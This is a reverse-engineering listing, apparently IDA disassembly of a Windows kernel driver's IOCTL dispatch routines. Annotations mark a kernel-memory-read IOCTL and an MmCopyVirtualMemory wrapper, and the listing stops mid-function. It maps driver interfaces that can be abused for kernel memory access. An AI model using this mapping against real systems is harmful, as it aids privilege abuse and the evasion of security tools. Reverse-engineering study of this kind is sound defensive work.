PAGE:FFFFF800188CD1B9
PAGE:FFFFF800188CD1B9 loc_FFFFF800188CD1B9: ; CODE XREF: sub_FFFFF800188CD000+F3↑j
PAGE:FFFFF800188CD1B9 mov rax, [rsp+30h]
PAGE:FFFFF800188CD1BE mov ecx, [rax]
PAGE:FFFFF800188CD1C0 call sub_FFFFF800188C696C
PAGE:FFFFF800188CD1C5 call sub_FFFFF800188C6994
PAGE:FFFFF800188CD1CA xor ecx, ecx
PAGE:FFFFF800188CD1CC cmp al, 1
PAGE:FFFFF800188CD1CE setz cl
PAGE:FFFFF800188CD1D1 mov dword ptr [rbp+1D0h+arg_20], ecx
PAGE:FFFFF800188CD1D7 jmp short loc_FFFFF800188CD17F
PAGE:FFFFF800188CD1D9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD1D9
PAGE:FFFFF800188CD1D9 loc_FFFFF800188CD1D9: ; CODE XREF: sub_FFFFF800188CD000+E7↑j
PAGE:FFFFF800188CD1D9 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD1DE lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD1E3 mov r8d, ebx
PAGE:FFFFF800188CD1E6 xor edx, edx
PAGE:FFFFF800188CD1E8 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD1ED mov rcx, [rsp+30h]
PAGE:FFFFF800188CD1F2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD1F7 call sub_FFFFF800188C4310
PAGE:FFFFF800188CD1FC test eax, eax
PAGE:FFFFF800188CD1FE jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD204 jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD209 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD209
PAGE:FFFFF800188CD209 loc_FFFFF800188CD209: ; CODE XREF: sub_FFFFF800188CD000+DB↑j
PAGE:FFFFF800188CD209 mov rax, [rsp+30h]
PAGE:FFFFF800188CD20E mov ecx, [rax]
PAGE:FFFFF800188CD210 call sub_FFFFF800188C48FC
PAGE:FFFFF800188CD215 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD21C
PAGE:FFFFF800188CD21C loc_FFFFF800188CD21C: ; CODE XREF: sub_FFFFF800188CD000+2EF↓j
PAGE:FFFFF800188CD21C ; sub_FFFFF800188CD000+2FE↓j ...
PAGE:FFFFF800188CD21C mov edx, 4
PAGE:FFFFF800188CD221 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD228 jmp loc_FFFFF800188CD5F0
PAGE:FFFFF800188CD22D ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD22D
PAGE:FFFFF800188CD22D loc_FFFFF800188CD22D: ; CODE XREF: sub_FFFFF800188CD000+CF↑j
PAGE:FFFFF800188CD22D mov rax, [rsp+30h]
PAGE:FFFFF800188CD232 xor ecx, ecx ; PoolType
PAGE:FFFFF800188CD234 mov edi, [rax+4]
PAGE:FFFFF800188CD237 mov ebx, [rax]
PAGE:FFFFF800188CD239 imul rdx, rdi, 318h
PAGE:FFFFF800188CD240 add rdx, 4 ; NumberOfBytes
PAGE:FFFFF800188CD244 call cs:ExAllocatePool
PAGE:FFFFF800188CD24A mov r8d, edi
PAGE:FFFFF800188CD24D mov ecx, ebx
PAGE:FFFFF800188CD24F mov rsi, rax
PAGE:FFFFF800188CD252 lea rdx, [rax+4]
PAGE:FFFFF800188CD256 call sub_FFFFF800188C274C
PAGE:FFFFF800188CD25B mov [rsi], eax
PAGE:FFFFF800188CD25D cmp eax, edi
PAGE:FFFFF800188CD25F movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD266 cmova eax, edi
PAGE:FFFFF800188CD269 mov r9, r15
PAGE:FFFFF800188CD26C movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD273 mov r8, r14
PAGE:FFFFF800188CD276 mov rcx, rsi
PAGE:FFFFF800188CD279 imul edx, eax, 318h
PAGE:FFFFF800188CD27F lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD284 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD289 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD291 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD296 movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD29C add edx, 4
PAGE:FFFFF800188CD29F mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD2A4 call sub_FFFFF800188C2270
PAGE:FFFFF800188CD2A9 mov rcx, rsi ; P
PAGE:FFFFF800188CD2AC
PAGE:FFFFF800188CD2AC loc_FFFFF800188CD2AC: ; CODE XREF: sub_FFFFF800188CD000+574↓j
PAGE:FFFFF800188CD2AC xor edx, edx ; Tag
PAGE:FFFFF800188CD2AE call cs:ExFreePoolWithTag
PAGE:FFFFF800188CD2B4 jmp loc_FFFFF800188CD62B
PAGE:FFFFF800188CD2B9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD2B9
PAGE:FFFFF800188CD2B9 loc_FFFFF800188CD2B9: ; CODE XREF: sub_FFFFF800188CD000+C9↑j
PAGE:FFFFF800188CD2B9 cmp ebx, 81064000h
PAGE:FFFFF800188CD2BF jz short loc_FFFFF800188CD320
PAGE:FFFFF800188CD2C1 cmp ebx, 81074000h
PAGE:FFFFF800188CD2C7 jz short loc_FFFFF800188CD303
PAGE:FFFFF800188CD2C9 cmp ebx, 81084000h
PAGE:FFFFF800188CD2CF jz short loc_FFFFF800188CD2F4
PAGE:FFFFF800188CD2D1 cmp ebx, 81094000h
PAGE:FFFFF800188CD2D7 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD2DD mov rax, [rsp+30h]
PAGE:FFFFF800188CD2E2 mov ecx, [rax]
PAGE:FFFFF800188CD2E4 call sub_FFFFF800188C35B0
PAGE:FFFFF800188CD2E9
PAGE:FFFFF800188CD2E9 loc_FFFFF800188CD2E9: ; CODE XREF: sub_FFFFF800188CD000+32C↓j
PAGE:FFFFF800188CD2E9 ; sub_FFFFF800188CD000+59C↓j
PAGE:FFFFF800188CD2E9 mov dword ptr [rbp+1D0h+arg_20], eax
PAGE:FFFFF800188CD2EF jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD2F4 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD2F4
PAGE:FFFFF800188CD2F4 loc_FFFFF800188CD2F4: ; CODE XREF: sub_FFFFF800188CD000+2CF↑j
PAGE:FFFFF800188CD2F4 mov dword ptr [rbp+1D0h+arg_20], 133ECF0h
PAGE:FFFFF800188CD2FE jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD303 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD303
PAGE:FFFFF800188CD303 loc_FFFFF800188CD303: ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
PAGE:FFFFF800188CD303 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD30A lea rdx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD311 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD316 call FFFFF800188C4214_WrapWrapMmCopyVirtualMemoryWrap
PAGE:FFFFF800188CD31B jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD320 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD320
PAGE:FFFFF800188CD320 loc_FFFFF800188CD320: ; CODE XREF: sub_FFFFF800188CD000+2BF↑j
PAGE:FFFFF800188CD320 mov rax, [rsp+30h]
PAGE:FFFFF800188CD325 mov ecx, [rax]
PAGE:FFFFF800188CD327 call sub_FFFFF800188C3614
PAGE:FFFFF800188CD32C jmp short loc_FFFFF800188CD2E9
PAGE:FFFFF800188CD32E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD32E
PAGE:FFFFF800188CD32E loc_FFFFF800188CD32E: ; CODE XREF: sub_FFFFF800188CD000+BC↑j
PAGE:FFFFF800188CD32E mov rax, [rsp+30h]
PAGE:FFFFF800188CD333 mov ecx, [rax]
PAGE:FFFFF800188CD335 call sub_FFFFF800188C6834
PAGE:FFFFF800188CD33A
PAGE:FFFFF800188CD33A loc_FFFFF800188CD33A: ; CODE XREF: sub_FFFFF800188CD000+484↓j
PAGE:FFFFF800188CD33A mov [rbp+1D0h+arg_20], rax
PAGE:FFFFF800188CD341 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD348 mov edx, 8
PAGE:FFFFF800188CD34D jmp loc_FFFFF800188CD5F0
PAGE:FFFFF800188CD352 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD352
PAGE:FFFFF800188CD352 loc_FFFFF800188CD352: ; CODE XREF: sub_FFFFF800188CD000+B6↑j
PAGE:FFFFF800188CD352 mov eax, 82044000h
PAGE:FFFFF800188CD357 cmp ebx, eax
PAGE:FFFFF800188CD359 ja loc_FFFFF800188CD4B1
PAGE:FFFFF800188CD35F jz loc_FFFFF800188CD489
PAGE:FFFFF800188CD365 cmp ebx, 81114000h
PAGE:FFFFF800188CD36B jz loc_FFFFF800188CD478
PAGE:FFFFF800188CD371 cmp ebx, 81124000h
PAGE:FFFFF800188CD377 jz loc_FFFFF800188CD407
PAGE:FFFFF800188CD37D cmp ebx, 82004000h
PAGE:FFFFF800188CD383 jz short loc_FFFFF800188CD3E6
PAGE:FFFFF800188CD385 cmp ebx, 82014000h
PAGE:FFFFF800188CD38B jz short loc_FFFFF800188CD3C1
PAGE:FFFFF800188CD38D cmp ebx, 82024000h
PAGE:FFFFF800188CD393 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD399 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD39E lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3A3 mov r8d, ebx
PAGE:FFFFF800188CD3A6 xor edx, edx
PAGE:FFFFF800188CD3A8 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD3AD mov rcx, [rsp+30h]
PAGE:FFFFF800188CD3B2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3B7 call sub_FFFFF800188C5F1C
PAGE:FFFFF800188CD3BC jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD3C1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD3C1
PAGE:FFFFF800188CD3C1 loc_FFFFF800188CD3C1: ; CODE XREF: sub_FFFFF800188CD000+38B↑j
PAGE:FFFFF800188CD3C1 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD3C6 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3CB mov r8d, ebx
PAGE:FFFFF800188CD3CE xor edx, edx
PAGE:FFFFF800188CD3D0 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD3D5 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD3DA xor ecx, ecx
PAGE:FFFFF800188CD3DC call sub_FFFFF800188C5FA0
PAGE:FFFFF800188CD3E1 jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD3E6 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD3E6
PAGE:FFFFF800188CD3E6 loc_FFFFF800188CD3E6: ; CODE XREF: sub_FFFFF800188CD000+383↑j
PAGE:FFFFF800188CD3E6 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD3EB and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD3F2 mov r8, [rcx]
PAGE:FFFFF800188CD3F5 mov rdx, [rcx+8]
PAGE:FFFFF800188CD3F9 mov rcx, [rcx+10h]
PAGE:FFFFF800188CD3FD call sub_FFFFF800188C6408
PAGE:FFFFF800188CD402 jmp loc_FFFFF800188CD21C
PAGE:FFFFF800188CD407 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD407
PAGE:FFFFF800188CD407 loc_FFFFF800188CD407: ; CODE XREF: sub_FFFFF800188CD000+377↑j
PAGE:FFFFF800188CD407 lea rcx, qword_FFFFF800188CDB10
PAGE:FFFFF800188CD40E jmp loc_FFFFF800189F2672
PAGE:FFFFF800188CD40E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD413 db 60h dup(0CCh)
PAGE:FFFFF800188CD473 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD473 jmp loc_FFFFF800188CD62B
PAGE:FFFFF800188CD478 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD478
PAGE:FFFFF800188CD478 loc_FFFFF800188CD478: ; CODE XREF: sub_FFFFF800188CD000+36B↑j
PAGE:FFFFF800188CD478 mov rax, [rsp+30h]
PAGE:FFFFF800188CD47D mov ecx, [rax]
PAGE:FFFFF800188CD47F call sub_FFFFF800188C3D44
PAGE:FFFFF800188CD484 jmp loc_FFFFF800188CD33A
PAGE:FFFFF800188CD489 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD489
PAGE:FFFFF800188CD489 loc_FFFFF800188CD489: ; CODE XREF: sub_FFFFF800188CD000+35F↑j
PAGE:FFFFF800188CD489 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD48E lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD493 mov r8d, ebx
PAGE:FFFFF800188CD496 xor edx, edx
PAGE:FFFFF800188CD498 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD49D mov rcx, [rsp+30h]
PAGE:FFFFF800188CD4A2 lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD4A7 call sub_FFFFF800188C6268
PAGE:FFFFF800188CD4AC jmp loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD4B1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD4B1
PAGE:FFFFF800188CD4B1 loc_FFFFF800188CD4B1: ; CODE XREF: sub_FFFFF800188CD000+359↑j
PAGE:FFFFF800188CD4B1 cmp ebx, 82054000h
PAGE:FFFFF800188CD4B7 jz loc_FFFFF800188CD5C6
PAGE:FFFFF800188CD4BD cmp ebx, 82064000h
PAGE:FFFFF800188CD4C3 jz loc_FFFFF800188CD5A1
PAGE:FFFFF800188CD4C9 cmp ebx, 82114000h
PAGE:FFFFF800188CD4CF jz loc_FFFFF800188CD579
PAGE:FFFFF800188CD4D5 cmp ebx, 83014000h
PAGE:FFFFF800188CD4DB jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD4E1 mov rbx, [rsp+30h]
PAGE:FFFFF800188CD4E6 cmp dword ptr [rbx], 88h
PAGE:FFFFF800188CD4EC jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD4F2 mov eax, [rbx+4]
PAGE:FFFFF800188CD4F5 xor ecx, ecx ; PoolType
PAGE:FFFFF800188CD4F7 imul rdx, rax, 2A8h
PAGE:FFFFF800188CD4FE add rdx, 4 ; NumberOfBytes
PAGE:FFFFF800188CD502 call cs:ExAllocatePool
PAGE:FFFFF800188CD508 mov rdi, rax
PAGE:FFFFF800188CD50B test rax, rax
PAGE:FFFFF800188CD50E jz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD514 lea rcx, [rax+4]
PAGE:FFFFF800188CD518 mov rdx, rbx
PAGE:FFFFF800188CD51B call sub_FFFFF800188C6038
PAGE:FFFFF800188CD520 mov [rdi], eax
PAGE:FFFFF800188CD522 mov r9, r15
PAGE:FFFFF800188CD525 mov ecx, [rbx+4]
PAGE:FFFFF800188CD528 mov r8, r14
PAGE:FFFFF800188CD52B movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD532 cmp eax, ecx
PAGE:FFFFF800188CD534 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD53B cmova eax, ecx
PAGE:FFFFF800188CD53E mov rcx, rdi
PAGE:FFFFF800188CD541 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD546 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD54E imul edx, eax, 2A8h
PAGE:FFFFF800188CD554 lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD559 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD55E movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD564 mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD569 add edx, 4
PAGE:FFFFF800188CD56C call sub_FFFFF800188C2270
PAGE:FFFFF800188CD571 mov rcx, rdi
PAGE:FFFFF800188CD574 jmp loc_FFFFF800188CD2AC
PAGE:FFFFF800188CD579 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD579
PAGE:FFFFF800188CD579 loc_FFFFF800188CD579: ; CODE XREF: sub_FFFFF800188CD000+4CF↑j
PAGE:FFFFF800188CD579 mov rax, [rsp+30h]
PAGE:FFFFF800188CD57E mov edx, cs:dword_FFFFF800188CA688
PAGE:FFFFF800188CD584 mov ecx, [rax]
PAGE:FFFFF800188CD586 xor ecx, 0BAEBAEECh
PAGE:FFFFF800188CD58C cmp ecx, edx
PAGE:FFFFF800188CD58E jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD594 mov eax, cs:dword_FFFFF800188CA6EC
PAGE:FFFFF800188CD59A xor eax, edx
PAGE:FFFFF800188CD59C jmp loc_FFFFF800188CD2E9
PAGE:FFFFF800188CD5A1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD5A1
PAGE:FFFFF800188CD5A1 loc_FFFFF800188CD5A1: ; CODE XREF: sub_FFFFF800188CD000+4C3↑j
PAGE:FFFFF800188CD5A1 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD5A6 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5AB mov r8d, ebx
PAGE:FFFFF800188CD5AE xor edx, edx
PAGE:FFFFF800188CD5B0 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD5B5 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD5BA lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5BF call sub_FFFFF800188C630C
PAGE:FFFFF800188CD5C4 jmp short loc_FFFFF800188CD5E9
PAGE:FFFFF800188CD5C6 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD5C6
PAGE:FFFFF800188CD5C6 loc_FFFFF800188CD5C6: ; CODE XREF: sub_FFFFF800188CD000+4B7↑j
PAGE:FFFFF800188CD5C6 mov ebx, 20h ; ' '
PAGE:FFFFF800188CD5CB lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5D0 mov r8d, ebx
PAGE:FFFFF800188CD5D3 xor edx, edx
PAGE:FFFFF800188CD5D5 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD5DA mov rcx, [rsp+30h]
PAGE:FFFFF800188CD5DF lea rdx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5E4 call sub_FFFFF800188C61BC
PAGE:FFFFF800188CD5E9
PAGE:FFFFF800188CD5E9 loc_FFFFF800188CD5E9: ; CODE XREF: sub_FFFFF800188CD000+204↑j
PAGE:FFFFF800188CD5E9 ; sub_FFFFF800188CD000+3BC↑j ...
PAGE:FFFFF800188CD5E9 lea rcx, [rsp+20h+arg_40]
PAGE:FFFFF800188CD5EE mov edx, ebx
PAGE:FFFFF800188CD5F0
PAGE:FFFFF800188CD5F0 loc_FFFFF800188CD5F0: ; CODE XREF: sub_FFFFF800188CD000+228↑j
PAGE:FFFFF800188CD5F0 ; sub_FFFFF800188CD000+34D↑j
PAGE:FFFFF800188CD5F0 movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD5F7 lea rax, [rsp+20h+arg_10]
PAGE:FFFFF800188CD5FC movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD603 movaps [rsp+20h+arg_10], xmm0
PAGE:FFFFF800188CD608 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD610 movsd [rsp+20h+arg_30], xmm0
PAGE:FFFFF800188CD616 movaps xmmword ptr [rsp+20h+arg_20], xmm1
PAGE:FFFFF800188CD61B
PAGE:FFFFF800188CD61B loc_FFFFF800188CD61B: ; CODE XREF: sub_FFFFF800188CD000+167↑j
PAGE:FFFFF800188CD61B ; sub_FFFFF800188CD000+1B4↑j
PAGE:FFFFF800188CD61B mov r9, r15
PAGE:FFFFF800188CD61E mov [rsp+20h+var_s0], rax
PAGE:FFFFF800188CD623 mov r8, r14
PAGE:FFFFF800188CD626 call sub_FFFFF800188C2270
PAGE:FFFFF800188CD62B
PAGE:FFFFF800188CD62B loc_FFFFF800188CD62B: ; CODE XREF: sub_FFFFF800188CD000+107↑j
PAGE:FFFFF800188CD62B ; sub_FFFFF800188CD000+1FE↑j ...
PAGE:FFFFF800188CD62B mov rbx, [rsp+30h]
PAGE:FFFFF800188CD630 test rbx, rbx
PAGE:FFFFF800188CD633 jz short loc_FFFFF800188CD640
PAGE:FFFFF800188CD635 xor edx, edx ; Tag
PAGE:FFFFF800188CD637 mov rcx, rbx ; P
PAGE:FFFFF800188CD63A call cs:ExFreePoolWithTag
PAGE:FFFFF800188CD640
PAGE:FFFFF800188CD640 loc_FFFFF800188CD640: ; CODE XREF: sub_FFFFF800188CD000+633↑j
PAGE:FFFFF800188CD640 mov al, 1
PAGE:FFFFF800188CD642
PAGE:FFFFF800188CD642 loc_FFFFF800188CD642: ; CODE XREF: sub_FFFFF800188CD000+AA↑j
PAGE:FFFFF800188CD642 lea r11, [rsp+20h+arg_280]
PAGE:FFFFF800188CD64A mov rbx, [r11+30h]
PAGE:FFFFF800188CD64E mov rsi, [r11+38h]
PAGE:FFFFF800188CD652 mov rsp, r11
PAGE:FFFFF800188CD655 pop r15
PAGE:FFFFF800188CD657 pop r14
PAGE:FFFFF800188CD659 pop r12
PAGE:FFFFF800188CD65B pop rdi
PAGE:FFFFF800188CD65C pop rbp
PAGE:FFFFF800188CD65D retn
PAGE:FFFFF800188CD65D sub_FFFFF800188CD000 endp
================================================
FILE: IDA/sub_FFFFF800188CD6E0.txt
================================================
PAGE:FFFFF800188CD6E0 ; =============== S U B R O U T I N E =======================================
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 sub_FFFFF800188CD6E0 proc near ; DATA XREF: sub_FFFFF800189F277D+130↓o
PAGE:FFFFF800188CD6E0 ; .upx0:FFFFF800189F29C4↓o ...
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 var_1A8 = qword ptr -1A8h
PAGE:FFFFF800188CD6E0 var_198 = byte ptr -198h
PAGE:FFFFF800188CD6E0 var_18 = byte ptr -18h
PAGE:FFFFF800188CD6E0 arg_0 = qword ptr 8
PAGE:FFFFF800188CD6E0 arg_8 = dword ptr 10h
PAGE:FFFFF800188CD6E0 P = qword ptr 18h
PAGE:FFFFF800188CD6E0 arg_18 = qword ptr 20h
PAGE:FFFFF800188CD6E0
PAGE:FFFFF800188CD6E0 mov [rsp+arg_0], rbx
PAGE:FFFFF800188CD6E5 mov [rsp+arg_18], rbp
PAGE:FFFFF800188CD6EA push rsi
PAGE:FFFFF800188CD6EB push rdi
PAGE:FFFFF800188CD6EC push r14
PAGE:FFFFF800188CD6EE sub rsp, 1B0h
PAGE:FFFFF800188CD6F5 mov rax, [rdx+0B8h]
PAGE:FFFFF800188CD6FC mov rbp, rdx
PAGE:FFFFF800188CD6FF mov rdi, [rdx+18h]
PAGE:FFFFF800188CD703 mov ecx, [rax+18h]
PAGE:FFFFF800188CD706 mov r8d, [rax+10h]
PAGE:FFFFF800188CD70A mov esi, [rax+8]
PAGE:FFFFF800188CD70D and qword ptr [rdx+38h], 0
PAGE:FFFFF800188CD712 cmp ecx, 80104000h
PAGE:FFFFF800188CD718 jnz short loc_FFFFF800188CD737
PAGE:FFFFF800188CD71A mov edx, r8d
PAGE:FFFFF800188CD71D mov rcx, rdi
PAGE:FFFFF800188CD720 call sub_FFFFF800188C21EC
PAGE:FFFFF800188CD725 mov cs:dword_FFFFF800188CA110, eax
PAGE:FFFFF800188CD72B neg eax
PAGE:FFFFF800188CD72D sbb rcx, rcx
PAGE:FFFFF800188CD730 and ecx, 1
PAGE:FFFFF800188CD733 mov [rdi], ecx
PAGE:FFFFF800188CD735 jmp short loc_FFFFF800188CD75C
PAGE:FFFFF800188CD737 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD737
PAGE:FFFFF800188CD737 loc_FFFFF800188CD737: ; CODE XREF: sub_FFFFF800188CD6E0+38↑j
PAGE:FFFFF800188CD737 lea eax, [rcx+7FEEC000h]
PAGE:FFFFF800188CD73D mov edx, 80134000h
PAGE:FFFFF800188CD742 test eax, 0FFFCFFFFh
PAGE:FFFFF800188CD747 jnz short loc_FFFFF800188CD751
PAGE:FFFFF800188CD749 cmp ecx, edx
PAGE:FFFFF800188CD74B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD751
PAGE:FFFFF800188CD751 loc_FFFFF800188CD751: ; CODE XREF: sub_FFFFF800188CD6E0+67↑j
PAGE:FFFFF800188CD751 cmp ecx, edx
PAGE:FFFFF800188CD753 jnz short loc_FFFFF800188CD766
PAGE:FFFFF800188CD755 call sub_FFFFF800188C2314
PAGE:FFFFF800188CD75A mov [rdi], eax
PAGE:FFFFF800188CD75C
PAGE:FFFFF800188CD75C loc_FFFFF800188CD75C: ; CODE XREF: sub_FFFFF800188CD6E0+55↑j
PAGE:FFFFF800188CD75C mov esi, 4
PAGE:FFFFF800188CD761 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD766 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD766
PAGE:FFFFF800188CD766 loc_FFFFF800188CD766: ; CODE XREF: sub_FFFFF800188CD6E0+73↑j
PAGE:FFFFF800188CD766 cmp ecx, 82054000h
PAGE:FFFFF800188CD76C jnz short loc_FFFFF800188CD77E
PAGE:FFFFF800188CD76E mov ecx, [rdi]
PAGE:FFFFF800188CD770 lea rdx, [rdi+4]
PAGE:FFFFF800188CD774 mov r8d, [rdx]
PAGE:FFFFF800188CD777 call sub_FFFFF800188C26D0
PAGE:FFFFF800188CD77C jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD77E ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD77E
PAGE:FFFFF800188CD77E loc_FFFFF800188CD77E: ; CODE XREF: sub_FFFFF800188CD6E0+8C↑j
PAGE:FFFFF800188CD77E cmp ecx, 83024000h
PAGE:FFFFF800188CD784 jnz short loc_FFFFF800188CD794
PAGE:FFFFF800188CD786 lea rcx, [rdi+4]
PAGE:FFFFF800188CD78A mov rdx, rdi
PAGE:FFFFF800188CD78D call sub_FFFFF800188C62EC
PAGE:FFFFF800188CD792 jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD794 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD794
PAGE:FFFFF800188CD794 loc_FFFFF800188CD794: ; CODE XREF: sub_FFFFF800188CD6E0+A4↑j
PAGE:FFFFF800188CD794 cmp ecx, 83074000h
PAGE:FFFFF800188CD79A jnz short loc_FFFFF800188CD7A9 ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD79C mov edx, [rdi]
PAGE:FFFFF800188CD79E lea rcx, [rdi+4]
PAGE:FFFFF800188CD7A2 call sub_FFFFF800188C5F18
PAGE:FFFFF800188CD7A7 jmp short loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD7A9 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD7A9
PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9: ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
PAGE:FFFFF800188CD7A9 cmp ecx, 83064000h ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD7AF jnz short loc_FFFFF800188CD7C8
PAGE:FFFFF800188CD7B1 mov rdx, [rdi]
PAGE:FFFFF800188CD7B4 lea rcx, [rdi+4]
PAGE:FFFFF800188CD7B8 mov r8d, [rdi+8]
PAGE:FFFFF800188CD7BC call sub_FFFFF800188C63A8
PAGE:FFFFF800188CD7C1
PAGE:FFFFF800188CD7C1 loc_FFFFF800188CD7C1: ; CODE XREF: sub_FFFFF800188CD6E0+9C↑j
PAGE:FFFFF800188CD7C1 ; sub_FFFFF800188CD6E0+B2↑j ...
PAGE:FFFFF800188CD7C1 mov [rdi], eax
PAGE:FFFFF800188CD7C3 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7C8 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD7C8
PAGE:FFFFF800188CD7C8 loc_FFFFF800188CD7C8: ; CODE XREF: sub_FFFFF800188CD6E0+CF↑j
PAGE:FFFFF800188CD7C8 cmp ecx, 82074000h
PAGE:FFFFF800188CD7CE jnz loc_FFFFF800188CD868
PAGE:FFFFF800188CD7D4 cmp r8d, 4
PAGE:FFFFF800188CD7D8 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7DE cmp esi, 38h ; '8'
PAGE:FFFFF800188CD7E1 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7E7 test rdi, rdi
PAGE:FFFFF800188CD7EA jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD7F0 mov r8d, 4746544Dh ; Tag
PAGE:FFFFF800188CD7F6 mov rdx, rsi ; NumberOfBytes
PAGE:FFFFF800188CD7F9 mov ecx, 1 ; PoolType
PAGE:FFFFF800188CD7FE call cs:ExAllocatePoolWithTag
PAGE:FFFFF800188CD804 mov r14, rax
PAGE:FFFFF800188CD807 lea rcx, [rsi-8]
PAGE:FFFFF800188CD80B mov rax, 0AAAAAAAAAAAAAAABh
PAGE:FFFFF800188CD815 mul rcx
